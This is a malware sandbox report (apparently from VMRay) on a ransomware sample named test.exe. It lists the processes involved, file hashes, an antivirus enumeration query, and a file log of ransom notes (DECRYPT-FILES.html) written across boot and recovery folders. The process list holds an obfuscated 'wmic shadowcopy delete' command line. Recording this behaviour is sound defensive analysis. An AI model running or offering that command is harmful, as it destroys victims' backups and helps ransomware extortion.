f9dfdce8...2a74 | Grouped Behavior
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Ransomware, Trojan

test.exe

Windows Exe (x86-32)

Created at 2019-06-01T18:40:00

...

Remarks (1/1)

(0x2000002): The maximum VM disk space was reached. The analysis was terminated prematurely.

Grouped Sequential

Remarks

(0x200001f): Code in memory was overwritten during this analysis. Review corresponding VTI for more info.

Monitored Processes

Process Graph

Process Graph Legend
Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0xa38 Analysis Target High (Elevated) test.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\test.exe" -
#2 0x36c RPC Server System (Elevated) svchost.exe C:\Windows\system32\svchost.exe -k netsvcs #1
#4 0xa78 Child Process High (Elevated) wmic.exe "C:\m\..\Windows\ovxhp\sff\qyv\..\..\..\system32\w\sfc\roma\..\..\..\wbem\ux\dgfg\..\..\wmic.exe" shadowcopy delete #1
#5 0xae8 RPC Server System (Elevated) wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding #2
#6 0xb08 RPC Server System (Elevated) vssvc.exe C:\Windows\system32\vssvc.exe #5

Behavior Information - Grouped by Category

Process #1: test.exe
9835 7
»
Information Value
ID #1
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\test.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:31, Reason: Analysis Target
Unmonitor End Time: 00:01:15, Reason: Terminated by Timeout
Monitor Duration 00:00:44
OS Process Information
»
Information Value
PID 0xa38
Parent PID 0x45c (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A3C
0x A48
0x A4C
0x A50
0x A54
0x A58
0x A6C
0x A70
0x A74
0x A80
0x A84
0x AD0
0x AD4
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
test.exe 0x00400000 0x00459FFF Relevant Image - 32-bit - True False
...
Hook Information
»
Type Installer Target Size Information Actions
Code test.exe:+0x32363 ntdll.dll:DbgUiRemoteBreakin+0x0 1 bytes -
...
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Boot\BOOTSTAT.DAT 64.26 KB MD5: 9d608e3d8417eb7c56907762c7405cfe
SHA1: 52578de1ff4b1714c9ecf46ec6bd3265b448ed55
SHA256: a56c3573e909ddf3620abce358b38ae1acfdd69d21130f39a2e5b6862f344dbb
SSDeep: 1536:2UqgOrNWMHTJxQ+jnatw5mLk4AS3rGg6R6KDX2:ygOrU2TJxQnQmLX3r88Kb2 		False
...
C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi 3.02 MB MD5: 6c8cd304002ba6bd422c58e306fde103
SHA1: 5a04bebd2b4993a53649095546831170c963d01f
SHA256: 2d8fd83fc4f4c5770c4176b143df31f83d5b5d07612fc0710dcc61e70504ee21
SSDeep: 98304:95GoTKOQ7MgTjyYpjkRtrLSm9JD34TFDgU9mj:jrUTjRk791iF0UIj 		False
...
C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim 161.38 MB MD5: e8a7823ba628d4c3b2dc7196fbf058bc
SHA1: c7eee2c21342743a59ee335ff525330f4d273410
SHA256: 364d5b08ed141e2cea519babf72a77285bba657d18bd2374db55bbd779d77b45
SSDeep: 196608:xlp6UMEbiZG5ygm8j3k0EHZWbVFmvVYyyZvOXWBEY+1BVQ:x+UMaigoX8zY5bVSv0YEBVQ 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst 34.55 KB MD5: 89de74772f8f5ca07afd7230d0f39b35
SHA1: a5b1fb84fe00d72e5d593e880d112b1f84a47fa1
SHA256: a6deb72e8ac69b7dde46ad14a75dae91c571ceb13de49286772ce8bb28598f4a
SSDeep: 768:B8uH1ZA7F5PgA7ao8MsLVqD8O0K/vmi53D5iEAGkVL21LFP+fE:yG/M5PgAeooLVqdur9VLSFms 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst 135.47 KB MD5: e0b7853f83dbdb26816e9bde97bfeefc
SHA1: 71ddd74cab13a317877090dfa3ae4c53b49e5a32
SHA256: 2db74a478b1f475b3a2ec965a9bf0a7ebd968d1a4189e124f04940865a8a2622
SSDeep: 3072:7ZnFaqG0actu95eRZtg5FtXtnHd3PdAzG4zZ0BH5dTRiuxLqQn4M:RFaqGhKA5C+dnHd94NgH5BxLqlM 		False
...
C:\\DECRYPT-FILES.html 6.43 KB MD5: 531773e2468abe0925223914e6e95d8b
SHA1: 844f9b65e1caf41f014d3fc7393ccf33d9a39c01
SHA256: ef84cd16c1f38d0749e5060286d624f75819940c34043e2cc3050756dbd596cd
SSDeep: 96:z2dMHJdgvOYEHdwLH+66GU2ZClg1D6A0Fl9B89HN2K3zaKo4W:sGwuHdwLH+DGURg1JAl9CHhur9 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst 52.20 KB MD5: ac013e7d8d6ca0f301f387c10eba509d
SHA1: 9668c981fb918a5333829c256d85aa645507d7b1
SHA256: 38a991403d5a297dac40971538baf4d9d86ca10ea84494735e86a2b115863ef5
SSDeep: 1536:qJB424/1d7gbOq4Eegs85FkSYxxUgtjiMgidCRCJYRDt:KB44bj4gwogz8VRh 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents 5.26 KB MD5: bd95c89d91ebc03b4d088b6cdfbc867c
SHA1: adbc196503e040d5f9641cf83d7cd09e67864014
SHA256: a0277c7ca4ed3e13dedc950b6041c098cc8d8b5302e8ad8c25dc49b4495a8ad6
SSDeep: 96:soMHwaw9ZFoBV2N20l3LtdSoVvlsThwVyUOCaRpMzrQC8DdoXPpgLIiz2Z5E:soMHEFoBANDVZMesTh4yUOPvMzrz8Dd5 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin 75.92 KB MD5: 8e9a56be470565a4c272341041e708fa
SHA1: ecffc9227c20121ec401661afcc7b76d6bd9dd8f
SHA256: eed9af6b4e4ae888c60631707c1b65f21a06f4561ce25fb342daa8ac32334fa3
SSDeep: 1536:dmsdtkU2OS8u5mh8MS6EjLoTTPFBWBF7UKxvZ87+nCTh51/1HP9om+EwuYD:dTtaOS8uUhvS6woTz+BF7RxvAgC3OmO7 		False
...
Modified Files
»
Filename File Size Hash Values YARA Match Actions
C:\Boot\BOOTSTAT.DAT 64.26 KB MD5: 9d608e3d8417eb7c56907762c7405cfe
SHA1: 52578de1ff4b1714c9ecf46ec6bd3265b448ed55
SHA256: a56c3573e909ddf3620abce358b38ae1acfdd69d21130f39a2e5b6862f344dbb
SSDeep: 1536:2UqgOrNWMHTJxQ+jnatw5mLk4AS3rGg6R6KDX2:ygOrU2TJxQnQmLX3r88Kb2 		False
...
C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi 3.02 MB MD5: 6c8cd304002ba6bd422c58e306fde103
SHA1: 5a04bebd2b4993a53649095546831170c963d01f
SHA256: 2d8fd83fc4f4c5770c4176b143df31f83d5b5d07612fc0710dcc61e70504ee21
SSDeep: 98304:95GoTKOQ7MgTjyYpjkRtrLSm9JD34TFDgU9mj:jrUTjRk791iF0UIj 		False
...
C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim 161.38 MB MD5: e8a7823ba628d4c3b2dc7196fbf058bc
SHA1: c7eee2c21342743a59ee335ff525330f4d273410
SHA256: 364d5b08ed141e2cea519babf72a77285bba657d18bd2374db55bbd779d77b45
SSDeep: 196608:xlp6UMEbiZG5ygm8j3k0EHZWbVFmvVYyyZvOXWBEY+1BVQ:x+UMaigoX8zY5bVSv0YEBVQ 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst 34.55 KB MD5: 89de74772f8f5ca07afd7230d0f39b35
SHA1: a5b1fb84fe00d72e5d593e880d112b1f84a47fa1
SHA256: a6deb72e8ac69b7dde46ad14a75dae91c571ceb13de49286772ce8bb28598f4a
SSDeep: 768:B8uH1ZA7F5PgA7ao8MsLVqD8O0K/vmi53D5iEAGkVL21LFP+fE:yG/M5PgAeooLVqdur9VLSFms 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst 135.47 KB MD5: e0b7853f83dbdb26816e9bde97bfeefc
SHA1: 71ddd74cab13a317877090dfa3ae4c53b49e5a32
SHA256: 2db74a478b1f475b3a2ec965a9bf0a7ebd968d1a4189e124f04940865a8a2622
SSDeep: 3072:7ZnFaqG0actu95eRZtg5FtXtnHd3PdAzG4zZ0BH5dTRiuxLqQn4M:RFaqGhKA5C+dnHd94NgH5BxLqlM 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst 52.20 KB MD5: ac013e7d8d6ca0f301f387c10eba509d
SHA1: 9668c981fb918a5333829c256d85aa645507d7b1
SHA256: 38a991403d5a297dac40971538baf4d9d86ca10ea84494735e86a2b115863ef5
SSDeep: 1536:qJB424/1d7gbOq4Eegs85FkSYxxUgtjiMgidCRCJYRDt:KB44bj4gwogz8VRh 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents 5.26 KB MD5: bd95c89d91ebc03b4d088b6cdfbc867c
SHA1: adbc196503e040d5f9641cf83d7cd09e67864014
SHA256: a0277c7ca4ed3e13dedc950b6041c098cc8d8b5302e8ad8c25dc49b4495a8ad6
SSDeep: 96:soMHwaw9ZFoBV2N20l3LtdSoVvlsThwVyUOCaRpMzrQC8DdoXPpgLIiz2Z5E:soMHEFoBANDVZMesTh4yUOPvMzrz8Dd5 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin 75.92 KB MD5: 8e9a56be470565a4c272341041e708fa
SHA1: ecffc9227c20121ec401661afcc7b76d6bd9dd8f
SHA256: eed9af6b4e4ae888c60631707c1b65f21a06f4561ce25fb342daa8ac32334fa3
SSDeep: 1536:dmsdtkU2OS8u5mh8MS6EjLoTTPFBWBF7UKxvZ87+nCTh51/1HP9om+EwuYD:dTtaOS8uUhvS6woTz+BF7RxvAgC3OmO7 		False
...
Host Behavior
COM (3)
»
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\SecurityCenter2 True 1
Fn
Execute WBEMLocator IWbemServices method_name = ExecQuery, query_language = WQL, query = Select * From AntiVirusPr True 1
Fn
File (565)
»
Operation Filename Additional Information Success Count Logfile
Create C:\ProgramData\foo.db desired_access = GENERIC_READ False 1
Fn
Create C:\ProgramData\foo.db desired_access = GENERIC_WRITE True 1
Fn
Create C:\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\$Recycle.Bin\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\$Recycle.Bin\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\$Recycle.Bin\S-1-5-21-3388679973-3930757225-3770151564-1000\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\$Recycle.Bin\S-1-5-21-3388679973-3930757225-3770151564-1000\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\$Recycle.Bin\S-1-5-21-3388679973-3930757225-3770151564-1000\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\$Recycle.Bin\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\BCD desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\BCD.LOG desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\BCD.LOG1 desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Boot\BCD.LOG2 desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Boot\BOOTSTAT.DAT desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Boot\cs-CZ\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\cs-CZ\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\cs-CZ\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\cs-CZ\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\da-DK\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\da-DK\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\da-DK\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\da-DK\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\de-DE\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\de-DE\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\de-DE\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\de-DE\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\el-GR\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\el-GR\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\el-GR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\el-GR\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\en-US\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\en-US\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\en-US\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\en-US\memtest.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\en-US\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\es-ES\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\es-ES\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\es-ES\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\es-ES\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\fi-FI\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\fi-FI\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\fi-FI\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\fi-FI\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\Fonts\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\Fonts\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\Fonts\chs_boot.ttf desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\Fonts\cht_boot.ttf desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\Fonts\jpn_boot.ttf desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\Fonts\kor_boot.ttf desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\Fonts\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\Fonts\wgl4_boot.ttf desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\fr-FR\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\fr-FR\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\fr-FR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\fr-FR\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\hu-HU\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\hu-HU\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\hu-HU\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\hu-HU\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\it-IT\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\it-IT\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\it-IT\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\it-IT\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\ja-JP\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\ja-JP\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\ja-JP\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\ja-JP\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\ko-KR\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\ko-KR\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\ko-KR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\ko-KR\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\memtest.exe desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\nb-NO\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\nb-NO\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\nb-NO\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\nb-NO\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\nl-NL\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\nl-NL\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\nl-NL\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\nl-NL\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\pl-PL\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\pl-PL\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\pl-PL\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\pl-PL\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\pt-BR\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\pt-BR\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\pt-BR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\pt-BR\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\pt-PT\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\pt-PT\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\pt-PT\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\pt-PT\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\ru-RU\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\ru-RU\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\ru-RU\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\ru-RU\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\sv-SE\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\sv-SE\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\sv-SE\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\sv-SE\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\tr-TR\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\tr-TR\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\tr-TR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\tr-TR\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\zh-CN\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\zh-CN\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\zh-CN\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\zh-CN\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\zh-HK\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\zh-HK\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\zh-HK\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\zh-HK\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\zh-TW\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Boot\zh-TW\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Boot\zh-TW\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\zh-TW\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\bootmgr desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Config.Msi\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Config.Msi\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Config.Msi\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Documents and Settings\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\hiberfil.sys desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\MSOCache\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\MSOCache\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\MSOCache\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\pagefile.sys desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\PerfLogs\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\PerfLogs\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\PerfLogs\Admin\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\PerfLogs\Admin\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\PerfLogs\Admin\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\PerfLogs\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Recovery\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Recovery\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
